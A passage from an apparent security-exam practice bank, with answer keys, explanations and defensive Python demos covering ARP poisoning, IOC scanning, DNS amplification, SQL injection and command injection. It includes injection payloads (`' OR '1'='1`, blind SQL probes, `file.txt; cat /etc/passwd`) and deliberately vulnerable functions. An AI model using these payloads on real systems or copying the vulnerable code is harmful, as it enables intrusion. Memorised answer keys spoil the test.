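def probe(func, value):
    """Run one lookup on a fresh table; return rows, or the database error text."""
    conn = setup_db()
    try:
        return func(conn, value)
    except sqlite3.OperationalError as err:
        return f"db error: {err}"
    finally:
        conn.close()


if __name__ == "__main__":
    for value in ["alice", "'", "' OR '1'='1"]:
        print(f"{value!r:16} vulnerable -> {probe(find_user_vulnerable, value)}")
        print(f"{value!r:16} safe       -> {probe(find_user_safe, value)}")
```

The error message from the vulnerable path is the signal question 151 describes; the parameterized path never produces it, because the value is sent separately from the statement and the database never parses it as SQL. Hiding the error (question 163, option C) would remove the signal but leave the `' OR '1'='1` result unchanged.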

164
Multi-Select · medium

A security analyst is investigating a potential data exfiltration incident. Which three of the following indicators are most commonly associated with a data exfiltration attack? (Choose three.)

Select 3 answers
A. Unusual outbound network traffic, especially during non-business hours
B. Multiple failed login attempts from a single user account
C. Large volumes of data being transferred to an external IP address
D. A sudden increase in DNS queries to a known malicious domain
E. A spike in CPU usage on a database server
F. An employee receiving a phishing email with a malicious attachment
Answers: A, C, D

Why this answer

Unusual outbound network traffic, especially during non-business hours, is a classic indicator of data exfiltration because attackers often schedule transfers when monitoring is less active. Large volumes of data being transferred to an external IP address directly suggests that sensitive data is being moved outside the organization. A sudden increase in DNS queries to a known malicious domain can indicate DNS tunneling, where data is encoded in DNS requests to bypass traditional network controls.

Exam trap

Cisco often tests the distinction between indicators of an active exfiltration event (like data transfer or unusual traffic patterns) and indicators of a precursor attack (like failed logins), so candidates mistakenly select the latter as a direct exfiltration indicator.

165
Multi-Select · hard

A packet capture from a branch office shows the default gateway IP mapped to a MAC address that does not belong to the router. The same suspicious MAC also answers for the DNS server IP, and gratuitous ARP replies appear every 30 seconds. Which two attacks best match this evidence? Select two.

Select 2 answers
A. ARP spoofing or poisoning is occurring on the local network.
B. A man-in-the-middle interception is likely happening between clients and internal services.
C. The network is experiencing a SYN flood against the gateway.
D. An external host is performing broad port scanning on public services.
E. A password-spraying campaign is targeting remote logins.
Answers: A, B

The evidence fits ARP poisoning because an unauthorized MAC address is associating itself with trusted IP addresses such as the gateway and DNS server. Gratuitous ARP replies reinforce the cache manipulation and allow the attacker to redirect traffic at the layer 2 level. This is the classic setup for a local network spoofing attack.

Why this answer

Option A is correct because the evidence shows the default gateway IP is mapped to a MAC address that does not belong to the router, and the same suspicious MAC also answers for the DNS server IP. This is a classic indicator of ARP spoofing or poisoning, where an attacker sends forged ARP replies to associate their MAC address with the IP addresses of critical network devices, such as the gateway and DNS server. Gratuitous ARP replies every 30 seconds further confirm an active ARP poisoning attack, as the attacker repeatedly broadcasts these unsolicited replies to maintain the poisoned ARP cache entries on victim hosts.

Exam trap

The trap here is that candidates may confuse ARP spoofing with a SYN flood or other denial-of-service attacks, failing to recognize that the specific evidence of a mismatched MAC address and gratuitous ARP replies directly points to ARP cache poisoning, not a network-level flood.
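The three pieces of evidence in this question (a trusted IP answered by the wrong MAC, one MAC answering for both gateway and DNS, gratuitous replies on a fixed timer) map directly onto three checks a monitor can run over captured ARP replies. The following is an added example, not part of the question bank or any IDS: it parses constructed ARP reply records against a known-good IP-to-MAC table and reports each pattern. The record format, trusted mappings, jitter tolerance and sample replies are assumptions.

```python
# Added example (not from the question bank): checks over a list of ARP
# replies that mirror the evidence in the question. Record format, trusted
# mappings and sample replies are constructed assumptions.
from collections import defaultdict
from datetime import datetime

# Known-good IP -> MAC mappings for the branch (constructed).
TRUSTED = {
    "10.10.0.1": "00:1a:2b:3c:4d:01",   # router / default gateway
    "10.10.0.53": "00:1a:2b:3c:4d:02",  # DNS server
}


def parse_arp(line):
    """Parse 'ISO-timestamp reply <ip> is-at <mac> [gratuitous]'."""
    parts = line.split()
    ts = datetime.fromisoformat(parts[0])
    gratuitous = len(parts) > 5 and parts[5] == "gratuitous"
    return ts, parts[2], parts[4].lower(), gratuitous


def analyze_arp(lines, trusted=TRUSTED, min_periodic=3, jitter_seconds=2.0):
    """Return a list of findings tuples; an empty list means nothing suspicious."""
    findings = []
    seen_mismatch = set()
    claims = defaultdict(set)          # mac -> set of IPs it answers for
    grat_times = defaultdict(list)     # (mac, ip) -> gratuitous reply timestamps

    for line in lines:
        ts, ip, mac, gratuitous = parse_arp(line)
        claims[mac].add(ip)
        if gratuitous:
            grat_times[(mac, ip)].append(ts)
        # 1. A trusted IP answered by a MAC other than the one we expect.
        if ip in trusted and trusted[ip] != mac and (ip, mac) not in seen_mismatch:
            seen_mismatch.add((ip, mac))
            findings.append(("mac-mismatch", ip, mac))

    # 2. One MAC answering for more than one trusted IP (gateway and DNS).
    for mac, ips in claims.items():
        critical = sorted(ips & set(trusted))
        if len(critical) > 1:
            findings.append(("multi-claim", mac, tuple(critical)))

    # 3. Gratuitous replies on a steady timer, i.e. an attacker refreshing caches.
    for (mac, ip), times in grat_times.items():
        if len(times) >= min_periodic:
            times.sort()
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            if max(gaps) - min(gaps) <= jitter_seconds:
                findings.append(("periodic-gratuitous", mac, ip,
                                 round(sum(gaps) / len(gaps))))
    return findings


_ATTACKER = "aa:bb:cc:dd:ee:ff"   # constructed rogue MAC
SAMPLE_ARP = [
    f"2024-05-01T09:00:00 reply 10.10.0.1 is-at {_ATTACKER} gratuitous",
    "2024-05-01T09:00:10 reply 10.10.0.1 is-at 00:1a:2b:3c:4d:01",   # the real router
    f"2024-05-01T09:00:15 reply 10.10.0.53 is-at {_ATTACKER} gratuitous",
    f"2024-05-01T09:00:30 reply 10.10.0.1 is-at {_ATTACKER} gratuitous",
    "2024-05-01T09:00:40 reply 10.10.0.77 is-at 00:1a:2b:3c:4d:77",  # ordinary client
    f"2024-05-01T09:01:00 reply 10.10.0.1 is-at {_ATTACKER} gratuitous",
    f"2024-05-01T09:01:30 reply 10.10.0.1 is-at {_ATTACKER} gratuitous",
]

if __name__ == "__main__":
    for finding in analyze_arp(SAMPLE_ARP):
        print(finding)
```

The mismatch check alone would also fire on a legitimate router replacement, which is why the other two signals matter: a single MAC claiming both gateway and DNS, refreshed on a 30-second cadence, is the interception setup the question describes, and the corrective control is Dynamic ARP Inspection with DHCP snooping on the access switches rather than anything on the hosts.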

166
MCQ · medium

Threat intelligence reports that an adversary changes domains daily and uses disposable cloud hosting, but the malware binary hash and a unique mutex name remain unchanged across incidents. Which indicator is the best candidate for immediate detection rule creation?

A. The daily domain names, because they are the easiest items to collect.
B. The malware file hash, because it directly identifies the reused sample.
C. The cloud provider name, because the attacker uses disposable infrastructure.
D. The time of day the campaign was observed, because the attacker is consistent.
Answer: B

The file hash is the strongest immediate IOC here because the same malware sample is being reused across incidents. If the binary remains unchanged, the hash will match exactly and can be used for fast blocking or hunting. Volatile infrastructure such as domains and cloud hosting changes too frequently to serve as the primary detection point.

Why this answer

Option B is correct because the malware file hash (e.g., SHA-256) provides a static, deterministic identifier for the exact binary sample. Since the adversary reuses the same malware binary across incidents, the hash remains unchanged and can be used to create a precise detection rule (e.g., a YARA rule or hash-based IOC blocklist) that will reliably match the malicious file regardless of network-level churn like domain or IP changes.

Exam trap

The trap here is that candidates often choose the 'easiest' or most visible indicator (domain names) without considering stability and false-positive risk, whereas the exam tests the principle that static, unique artifacts (like file hashes) are superior for detection rule creation.

How to eliminate wrong answers

Option A is wrong because daily domain names are highly volatile and ephemeral; they change every 24 hours, making them poor candidates for a stable detection rule and requiring constant updates. Option C is wrong because the cloud provider name (e.g., AWS, Azure, GCP) is a generic attribute shared by millions of legitimate services; using it as a detection indicator would cause massive false positives and does not uniquely identify the adversary's infrastructure. Option D is wrong because the time of day the campaign was observed is not a reliable or unique indicator; attackers can easily shift their activity window, and time-based rules lack specificity and are prone to false positives.
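To make the stability argument concrete, here is an added example (not from the original page) that scans a few constructed in-memory "files" against two indicators from the scenario: a SHA-256 hash of the reused sample and the unique mutex string. The sample bytes, file names and mutex name are invented for illustration and are not real malware or real IOCs.

```python
import hashlib

MUTEX_NAME = b"Global\\Upd8Svc_3f1c"   # constructed mutex string, not a real IOC

# Constructed stand-ins for files on disk (not real malware): the reused sample,
# a copy with one byte patched, and an unrelated benign file.
ORIGINAL_SAMPLE = b"MZ\x90\x00" + b"\x00" * 48 + MUTEX_NAME + b"\x00" * 16 + b"END"
PATCHED_SAMPLE = ORIGINAL_SAMPLE[:-1] + b"\x01"          # a single byte differs
BENIGN_FILE = b"MZ\x90\x00" + b"hello world" * 8

FILES = {
    "incident1.exe": ORIGINAL_SAMPLE,
    "incident2.exe": ORIGINAL_SAMPLE,   # the same binary reused, as in the report
    "incident3.exe": PATCHED_SAMPLE,    # the operator later patched or recompiled it
    "notepad.exe": BENIGN_FILE,
}


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


# The hash-based IOC, derived from the reused sample the way a SIEM or EDR blocklist would.
IOC_HASHES = {sha256_hex(ORIGINAL_SAMPLE)}


def scan(files, ioc_hashes, mutex):
    """Return {name: [indicator, ...]} for every file that trips at least one indicator."""
    results = {}
    for name, data in files.items():
        hits = []
        if sha256_hex(data) in ioc_hashes:
            hits.append("sha256")       # exact match, effectively zero false positives
        if mutex in data:               # string match, the kind of test a YARA rule makes
            hits.append("mutex")
        if hits:
            results[name] = hits
    return results
```

The two incident copies match on both indicators, which is why the hash is the right first rule: it is exact and costs nothing to deploy. The patched copy shows the hash's limit, a one-byte change defeats it while the mutex string still matches, so the mutex is the natural second rule once the hash is in place.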

167
MCQmedium

A help desk analyst receives a phone call from someone claiming to be the CFO, who says their phone was lost while traveling and requests an immediate MFA reset and temporary bypass for payroll access. The caller knows the CFO's last name and the company name, but cannot answer the callback verification question. What attack technique is most likely being used?

A.Phishing
B.Vishing
C.Baiting
D.Watering hole attack
AnswerB

Vishing is voice-based social engineering over a phone call. The attacker is using urgency, authority, and a fabricated story to pressure the analyst into changing authentication controls.

Why this answer

The caller is using voice communication to impersonate a senior executive (the CFO) and pressure the help desk analyst into weakening an authentication control, which is the defining characteristic of vishing (voice phishing). The request for an MFA reset and temporary bypass leans on authority bias and urgency, and failing the callback verification question is a strong sign that the caller is not who they claim to be; the analyst should decline, end the call, and reach the real CFO through a known number before changing anything.

Exam trap

The trap here is that candidates may confuse vishing with phishing because both involve social engineering, but vishing is specifically voice-based, and the question's context of a phone call and callback verification failure directly points to vishing, not email-based phishing.

How to eliminate wrong answers

Option A (Phishing) is wrong because phishing typically involves deceptive emails, text messages, or websites to steal credentials or deliver malware, not a direct phone call requesting an MFA bypass. Option C (Baiting) is wrong because baiting relies on offering something enticing (e.g., a free USB drive or download) to trick a victim into performing an action, not impersonating an executive over the phone. Option D (Watering hole attack) is wrong because it compromises a website frequently visited by the target group to infect them with malware, not a direct social engineering call to a help desk.

168
MCQmedium

A security analyst is reviewing the results of a dynamic application security test (DAST) on a new e-commerce application. The report indicates that the application's product search functionality is vulnerable to blind SQL injection. The analyst is tasked with recommending a remediation to the development team. The developers currently concatenate user input directly into SQL queries. Which of the following recommendations would most effectively and permanently mitigate this vulnerability?

A.Implement a web application firewall (WAF) rule to block suspicious SQL keywords in search parameters.
B.Sanitize user input by escaping single quotes and other special characters before concatenation.
C.Replace dynamic SQL queries with parameterized prepared statements.
D.Encode all user input using HTML entity encoding before database operations.
AnswerC

Parameterized prepared statements ensure that user input is always treated as data, not executable code. The database compiles the SQL statement with parameter placeholders, and the actual values are bound separately, so the input cannot alter the query structure no matter what characters it contains. This is the industry-standard permanent fix. One caveat: placeholders work for values only; a column name, table name, or sort direction supplied by the user still has to be checked against an allowlist.

Why this answer

Option C is correct because parameterized prepared statements separate SQL logic from user input, ensuring that input is always treated as data, not executable code. This permanently prevents SQL injection by design, regardless of the input content, unlike input filtering or WAF rules which can be bypassed.

Exam trap

The trap here is that candidates often choose input sanitization (Option B) because they confuse escaping with parameterization. Escaping is a fragile, context-dependent workaround: it protects only a quoted string context, so it fails where the value sits in a numeric or identifier position, it breaks under character-set mismatches such as multibyte encodings, and it does nothing for second-order injection, where a stored value is later concatenated into another query.

How to eliminate wrong answers

Option A is wrong because a WAF rule that blocks suspicious SQL keywords is a reactive, bypassable control; attackers can encode or obfuscate payloads to evade pattern matching. Option B is wrong because escaping special characters is error-prone and insufficient; it does not prevent second-order injection or attacks that exploit character set mismatches. Option D is wrong because HTML entity encoding is designed for output encoding to prevent XSS, not for SQL query construction; it does not alter how the database interprets the input.
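The following Python, an added example rather than code from the original page, puts the three approaches side by side against an in-memory SQLite table (the product data and the "hidden" column are constructed for the demo). It shows the blind, boolean-based probe a DAST tool would use against the concatenated query, why quote-escaping still fails in a numeric context, and how the parameterized versions make both payloads inert.

```python
import sqlite3


def build_demo_db():
    """In-memory product table with one row customers must never see (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, hidden INTEGER)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(1, "USB-C cable", 0), (2, "Laptop stand", 0), (3, "Unreleased headset", 1)],
    )
    return conn


def search_concatenated(conn, term):
    """VULNERABLE: the term becomes part of the SQL text, so a quote or comment
    marker in it rewrites the statement. Mirrors the developers' current code."""
    sql = "SELECT name FROM products WHERE hidden = 0 AND name LIKE '%" + term + "%'"
    return sorted(row[0] for row in conn.execute(sql))


def lookup_escaped(conn, id_text):
    """STILL VULNERABLE: doubling quotes (Option B) only helps inside a quoted
    string; in a numeric context there is no quote to break out of."""
    sql = "SELECT name FROM products WHERE hidden = 0 AND id = " + id_text.replace("'", "''")
    return sorted(row[0] for row in conn.execute(sql))


def search_parameterized(conn, term):
    """SAFE: the statement is compiled with a placeholder and the term is bound
    as a value, so it can never change the query structure."""
    sql = "SELECT name FROM products WHERE hidden = 0 AND name LIKE ?"
    return sorted(row[0] for row in conn.execute(sql, ("%" + term + "%",)))


def lookup_parameterized(conn, id_text):
    """SAFE: validate the type, then bind. A payload such as "1 OR hidden = 1"
    is rejected before the database ever sees it."""
    product_id = int(id_text)            # raises ValueError for anything but an integer
    sql = "SELECT name FROM products WHERE hidden = 0 AND id = ?"
    return sorted(row[0] for row in conn.execute(sql, (product_id,)))


def blind_probe(conn, search_fn):
    """Boolean-based blind probe: the attacker never sees the hidden row, only
    whether 'cable' still matches when a condition about row 3 is appended.
    Returns True when the two responses differ, i.e. the search is injectable."""
    cond_true = "cable' AND (SELECT hidden FROM products WHERE id = 3) = 1 --"
    cond_false = "cable' AND (SELECT hidden FROM products WHERE id = 3) = 0 --"
    return search_fn(conn, cond_true) != search_fn(conn, cond_false)
```

Against `search_concatenated`, `blind_probe` returns True because the appended condition changes whether "USB-C cable" comes back, which is the signal the DAST report is describing; against `search_parameterized` both probes are just literal search strings and the function returns False. The `int()` call in `lookup_parameterized` is not what prevents injection (the placeholder does), but typing the value at the boundary is cheap and turns a malformed input into a clear error.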

169
MCQmedium

A public-facing web service suddenly becomes very slow. NetFlow shows a high volume of small DNS queries leaving attacker-controlled systems and much larger DNS responses arriving at the victim's IP address from many different resolvers. Which attack is taking place?

A.DNS amplification DDoS
B.Replay attack
C.ARP poisoning
D.Session fixation
AnswerA

DNS amplification uses small spoofed queries to elicit much larger responses toward the victim.

Why this answer

This is a DNS amplification DDoS attack. The attacker sends small DNS queries with a spoofed source IP (the victim's IP) to open DNS resolvers, which then send large DNS responses to the victim. The high volume of small queries and much larger responses from many resolvers is the classic signature of an amplification attack, exploiting the UDP protocol's lack of source verification.

Exam trap

The trap here is that candidates may see only "a lot of DNS traffic" and think of a generic DNS flood. Amplification is a form of reflection attack; what separates it from plain reflection or an ordinary volumetric flood is the amplification ratio, small spoofed queries producing much larger responses, which is exactly what the NetFlow data shows.

How to eliminate wrong answers

Option B is wrong because a replay attack involves capturing and retransmitting valid network traffic (e.g., authentication packets) to impersonate a user or gain unauthorized access, not generating high-volume DNS traffic from multiple resolvers. Option C is wrong because ARP poisoning is a local network attack that manipulates ARP tables to intercept traffic on a LAN, not a distributed attack using DNS queries and responses across the internet. Option D is wrong because session fixation is a web-session attack in which the attacker forces a known session identifier onto the victim before login; it involves no DNS traffic at all.
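The signature the question describes can be computed from flow data. This Python is an added example, not code from the original page: it summarizes constructed NetFlow-style records (the addresses, counters and thresholds are assumptions) and flags any host that receives DNS responses from many distinct resolvers totalling far more bytes than the queries that host actually sent.

```python
from collections import defaultdict

VICTIM = "203.0.113.10"

# Constructed flow records (NetFlow-style 5-tuples with counters), not a real export.
SAMPLE_FLOWS = [
    # 40 open resolvers each returning large responses to the victim
    *[{"src": f"198.51.100.{i}", "dst": VICTIM, "proto": "udp", "sport": 53,
       "dport": 40000 + i, "packets": 500, "bytes": 500 * 3200} for i in range(1, 41)],
    # the victim itself sent only two small queries, so it never asked for that traffic
    {"src": VICTIM, "dst": "198.51.100.1", "proto": "udp", "sport": 51000, "dport": 53,
     "packets": 2, "bytes": 140},
    # an ordinary client whose queries and responses roughly balance
    {"src": "192.0.2.5", "dst": "198.51.100.7", "proto": "udp", "sport": 52000, "dport": 53,
     "packets": 100, "bytes": 7000},
    {"src": "198.51.100.7", "dst": "192.0.2.5", "proto": "udp", "sport": 53, "dport": 52000,
     "packets": 100, "bytes": 15000},
]


def detect_dns_amplification(flows, min_resolvers=10, min_ratio=10.0):
    """Return {host: stats} for hosts that receive DNS responses from at least
    min_resolvers distinct sources totalling min_ratio times the bytes they queried."""
    responses = defaultdict(lambda: {"resolvers": set(), "bytes": 0, "packets": 0})
    queries = defaultdict(lambda: {"bytes": 0, "packets": 0})

    for f in flows:
        if f["proto"] != "udp":
            continue
        if f["sport"] == 53:                      # resolver -> host
            r = responses[f["dst"]]
            r["resolvers"].add(f["src"])
            r["bytes"] += f["bytes"]
            r["packets"] += f["packets"]
        elif f["dport"] == 53:                    # host -> resolver
            q = queries[f["src"]]
            q["bytes"] += f["bytes"]
            q["packets"] += f["packets"]

    victims = {}
    for host, r in responses.items():
        q = queries.get(host, {"bytes": 0, "packets": 0})
        ratio = r["bytes"] / q["bytes"] if q["bytes"] else float("inf")
        if len(r["resolvers"]) >= min_resolvers and ratio >= min_ratio:
            victims[host] = {
                "resolvers": len(r["resolvers"]),
                "response_bytes": r["bytes"],
                "query_bytes": q["bytes"],
                "amplification": ratio,
                "avg_response_size": r["bytes"] / r["packets"],
            }
    return victims
```

Note what the victim's own flow data can and cannot show: the spoofed queries leave the attacker's hosts and are visible only on the attacker's or the resolvers' networks, so from the victim's vantage point the evidence is the mismatch between responses received and queries sent, plus the unusually large average response size.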

170
MCQeasy

A user's laptop starts renaming many documents, and a ransom note appears on the desktop. What is the best immediate action for the help desk to recommend?

A.Shut down the laptop immediately and leave it on the desk.
B.Disconnect the laptop from the network to contain the infection.
C.Delete the ransom note and continue working until the next reboot.
D.Install a new browser extension to block the attacker.
AnswerB

Removing network access helps prevent the malware from reaching file shares, backup systems, or other hosts while preserving the running state for later analysis.

Why this answer

Disconnecting the laptop from the network immediately cuts the ransomware off from file shares, backup targets, and other hosts it could encrypt or spread to, and from any command-and-control channel it may use. This containment step comes before any remediation: it limits the blast radius while keeping the host powered on, so memory, running processes, and network state remain available for analysis.

Exam trap

The trap here is that candidates confuse immediate containment with system shutdown, mistakenly believing that powering off stops the attack, when in fact network isolation is the correct first step to halt both encryption and lateral spread.

How to eliminate wrong answers

Option A is wrong because powering off discards volatile evidence (the running process list, network connections, and any in-memory encryption keys or configuration a decryption tool might need) and gives responders no chance to observe or stop the process; network isolation contains the host while keeping that state available. Option C is wrong because deleting the ransom note does not stop the encryption process; the ransomware continues to encrypt files in the background, and working normally risks further damage and potential spread to network resources. Option D is wrong because installing a browser extension does not address the active ransomware infection; it is an irrelevant action that wastes time and could introduce additional risk.

171
MCQmedium

A security analyst receives a phone call from an individual claiming to be a member of the IT help desk. The caller states that an emergency security update requires the analyst's password immediately, and the request sounds urgent. The analyst notices the caller's voice is unfamiliar and the background noise is inconsistent with an office environment. Which type of social engineering attack is being attempted?

A.Phishing
B.Vishing
C.Spear phishing
D.Pretexting
AnswerB

Vishing (voice phishing) is the correct answer because the attack uses a phone call to impersonate a legitimate entity and trick the victim into disclosing sensitive information, such as a password. Urgency and impersonation of an internal support team are common vishing tactics, and the unfamiliar voice and out-of-place background noise are the cues that gave this caller away.

Why this answer

This is a vishing (voice phishing) attack because the threat actor uses a phone call to impersonate IT help desk personnel and pressures the analyst into disclosing sensitive credentials. Vishing specifically leverages voice communication to bypass email-based security controls and exploit human trust through urgency and authority.

Exam trap

The trap here is that candidates confuse pretexting with vishing, but CompTIA distinguishes vishing as a subtype of social engineering that specifically uses voice technology, whereas pretexting is the broader act of fabricating an identity or scenario regardless of the communication channel.

How to eliminate wrong answers

Option A is wrong because phishing refers to broad, mass-distributed fraudulent emails or messages that trick users into clicking malicious links or attachments, not a direct phone call. Option C is wrong because spear phishing is a targeted email attack customized for a specific individual or organization, using personal details to increase credibility, not a voice call. Option D is wrong because pretexting is a broader social engineering technique where the attacker fabricates a scenario (pretext) to obtain information; while the call involves a pretext, the specific use of voice communication makes vishing the correct classification under the CompTIA SY0-701 framework.

172
MCQmedium

A security analyst is investigating a web application that allows users to input a filename to view its contents. The application passes the user input directly to a system command without sanitization. An attacker submits the input 'file.txt; cat /etc/passwd' and successfully retrieves the contents of the password file. Which type of attack occurred?

A.Cross-site scripting (XSS)
B.SQL injection
C.Command injection
D.Directory traversal
AnswerC

Command injection allows an attacker to execute arbitrary system commands by exploiting unsanitized input passed to system calls. The use of a semicolon to chain commands is a classic indicator of this attack.

Why this answer

The application passes user input directly to a system command without sanitization. The attacker's input 'file.txt; cat /etc/passwd' uses a semicolon to terminate the intended command and execute a second command, which retrieves the password file. This is a classic command injection attack, where arbitrary system commands are executed via the vulnerable interface.

Exam trap

Cisco often tests the distinction between command injection and directory traversal by using a payload that includes both a path and a command separator, leading candidates to mistakenly choose directory traversal when the core exploit is command execution via shell metacharacters.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not executing system commands on the server. Option B is wrong because SQL injection targets database queries by manipulating SQL syntax, not operating system commands. Option D is wrong because directory traversal exploits path manipulation to access files outside the web root, but it does not execute arbitrary system commands; the attack here uses command chaining with a semicolon, not path traversal.
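To show why the semicolon works and what the fix looks like, here is an added Python example (not code from the original page). It builds the vulnerable shell command exactly as the scenario describes and contrasts it with an allowlisted, shell-free version; the scratch directory, file name pattern and the harmless `echo INJECTED` stand-in for `cat /etc/passwd` are assumptions for the demo. It assumes a POSIX system with `cat` available.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Only plain file names: no path separators, no shell metacharacters (assumed policy).
SAFE_NAME = re.compile(r"^[A-Za-z0-9._-]{1,64}$")


def view_file_vulnerable(base_dir, filename):
    """VULNERABLE: the name is spliced into a shell command line, so ';', '|',
    '&&' and '$(...)' in it are parsed as shell syntax. Mirrors the scenario."""
    result = subprocess.run(f"cat {base_dir}/{filename}", shell=True,
                            capture_output=True, text=True)
    return result.stdout


def view_file_safe(base_dir, filename):
    """SAFE: allowlist the name, pin it inside base_dir, and pass it as one argv
    element with no shell, so metacharacters are just bytes in a file name."""
    if not SAFE_NAME.match(filename):
        raise ValueError("file name contains characters outside the allowlist")
    base = Path(base_dir).resolve()
    target = (base / filename).resolve()
    if target.parent != base:            # also defeats ../ traversal and symlink escapes
        raise ValueError("path escapes the allowed directory")
    result = subprocess.run(["cat", str(target)], capture_output=True, text=True, check=True)
    return result.stdout


def demo():
    """Run both versions against the page's style of payload in a scratch directory."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "file.txt").write_text("hello\n")
        payload = "file.txt; echo INJECTED"      # stands in for 'file.txt; cat /etc/passwd'
        vulnerable_output = view_file_vulnerable(d, payload)
        try:
            view_file_safe(d, payload)
            safe_outcome = "accepted"
        except ValueError as exc:
            safe_outcome = f"rejected: {exc}"
        return {
            "vulnerable_output": vulnerable_output,    # "hello\nINJECTED\n"
            "safe_outcome": safe_outcome,
            "legitimate": view_file_safe(d, "file.txt"),
        }
```

Two points worth taking from it. First, the argv form alone would already stop the injection (the shell never sees the string), but the allowlist turns a confusing "No such file" into an explicit rejection and the `resolve()` check covers Option D's traversal case as well. Second, if the only need is to read a file, do not spawn a process at all; the example keeps `cat` only to stay faithful to the scenario.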

173
MCQeasy

A security team can patch only one system today. Which asset should be remediated first?

A.An internal print server with a high-severity finding and no direct user access
B.A lab workstation with a critical finding and no sensitive data
C.An internet-facing application server with a critical vulnerability and a known exploit
D.A user laptop with a medium-severity issue that requires local access
AnswerC

An internet-facing system with a critical vulnerability and a known exploit has the highest immediate risk. Attackers can reach it easily, and public exploit code increases the chance of compromise, so it should be patched first.

Why this answer

Option C is correct because an internet-facing application server with a critical vulnerability and a known exploit represents the highest risk: it is exposed to external threats, the vulnerability is critical, and a known exploit means attackers can reliably compromise it. Patching this system first reduces the likelihood of a remote breach that could lead to data exfiltration or service disruption, aligning with the principle of prioritizing assets with the greatest attack surface and exploitability.

Exam trap

CompTIA often tests the misconception that the highest CVSS score (critical vs. high/medium) alone dictates remediation priority, but the trap here is that asset exposure and exploitability—specifically an internet-facing server with a known exploit—override internal assets with higher severity but lower risk.

How to eliminate wrong answers

Option A is wrong because an internal print server with a high-severity finding and no direct user access has a lower attack surface (internal network only) and no direct user interaction, making it less urgent than an internet-facing system with a critical vulnerability and known exploit. Option B is wrong because a lab workstation with a critical finding and no sensitive data, while serious, is typically isolated or used for testing, so the impact of compromise is limited compared to an externally reachable server. Option D is wrong because a user laptop with a medium-severity issue that requires local access is less critical—medium severity and local access requirement reduce the likelihood of remote exploitation, and user laptops can often be mitigated temporarily with user awareness or endpoint controls.

174
MCQeasy

An employee receives a text message that says, "Your MFA enrollment expired. Tap here now to re-activate access or your account will be locked." What should the employee do first?

A.Tap the link and complete the MFA reset immediately
B.Verify the request using a known company contact method and report the text
C.Forward the text to coworkers so they can watch for it too
D.Reply to the sender and ask for more details
AnswerB

This is the best first step because the employee should not trust a security-related request delivered through an unexpected text message. Using a known internal help desk number, portal, or security reporting process confirms whether the request is legitimate. It also helps the organization investigate the suspicious message quickly.

Why this answer

Option B is correct because the message is a classic phishing attempt designed to harvest MFA credentials or session tokens. The employee must first verify the request through a trusted company channel (e.g., calling the IT help desk or checking the official security portal) and then report the text to the security team. This prevents falling for social engineering that could bypass MFA protections.

Exam trap

The trap here is that candidates assume MFA is unbreakable and rush to re-enroll, not realizing that phishing kits can intercept MFA tokens in real time via reverse proxy attacks.

How to eliminate wrong answers

Option A is wrong because tapping the link could lead to a fake MFA portal that captures the employee's credentials or session tokens, compromising their account. Option C is wrong because forwarding the text to coworkers risks spreading the phishing attempt and may cause others to fall for it before the threat is contained. Option D is wrong because replying to the sender confirms the phone number is active and may expose the employee to further targeted attacks or malware delivery.

175
MCQmedium

A vulnerability scan reports that a Windows file share has SMB signing disabled and anonymous read access is permitted to one directory containing payroll exports. No exploitation has been observed yet. Which action best reduces exposure with minimal business impact?

A.Remove all backup jobs until the scan is cleared.
B.Disable the file server and rebuild it from scratch immediately.
C.Enable SMB signing and remove anonymous access to the share.
D.Increase the directory quota so the share cannot overflow.
AnswerC

This is the best targeted remediation because it directly addresses both weaknesses identified by the scan. SMB signing helps protect integrity for SMB traffic, and removing anonymous read access prevents unauthorized users from viewing sensitive payroll data. Together, these changes reduce exposure without taking the entire server offline. In vulnerability management, the best choice is often a precise configuration fix that closes the finding while preserving business continuity and avoiding more disruptive action than necessary.

Why this answer

Option C is correct because enabling SMB signing lets client and server detect altered or relayed SMB messages, which blocks NTLM relay and man-in-the-middle tampering against the share (signing provides integrity, not confidentiality; SMB encryption is a separate setting), and removing anonymous read access eliminates unauthorized visibility into the payroll data. These changes directly address the two findings without disrupting legitimate file-sharing operations. The one thing to check before requiring signing is whether any legacy client or appliance that cannot sign still depends on the share, since those connections will fail once signing is mandatory.

Exam trap

The trap here is that candidates may overreact by choosing extreme remediation (like rebuilding the server) or irrelevant actions (like adjusting quotas), instead of recognizing that targeted configuration changes (enabling SMB signing and removing anonymous access) are the proportional, low-impact fix.

How to eliminate wrong answers

Option A is wrong because removing backup jobs does not address the SMB signing or anonymous access vulnerabilities; it would only increase data loss risk without reducing exposure. Option B is wrong because immediately disabling and rebuilding the file server is an extreme, unnecessary measure that causes significant business disruption; the vulnerabilities can be fixed with configuration changes. Option D is wrong because increasing the directory quota prevents overflow but does not mitigate the security issues of disabled SMB signing or anonymous read access.

176
MCQmedium

A scanner reports a critical vulnerability on an internal Linux server. The administrator confirms the vulnerable package is installed, but the affected feature is only enabled when an optional module is loaded, and that module is currently disabled. The server also requires downtime for patching. What is the best next step?

A.Immediately accept the risk and leave the server unchanged
B.Verify whether the vulnerable function is reachable, then apply a compensating control or schedule remediation
C.Mark the finding as a false positive and close the ticket
D.Remove the server from production immediately and rebuild it from scratch
AnswerB

Risk-based remediation starts by confirming exploitability, then choosing the least disruptive control that reduces exposure.

Why this answer

Option B is correct because even though the vulnerable module is disabled, the administrator must first verify that the vulnerable function is not reachable through other means (e.g., via a different service or misconfiguration). If it is unreachable, applying a compensating control (like a firewall rule or SELinux policy) can mitigate risk without immediate downtime, allowing patching to be scheduled. This aligns with the principle of defense-in-depth and proper risk management.

Exam trap

The trap here is that candidates assume a disabled module means the vulnerability is automatically not exploitable, ignoring that the vulnerable code is still present and could be enabled through other vectors or misconfiguration.

How to eliminate wrong answers

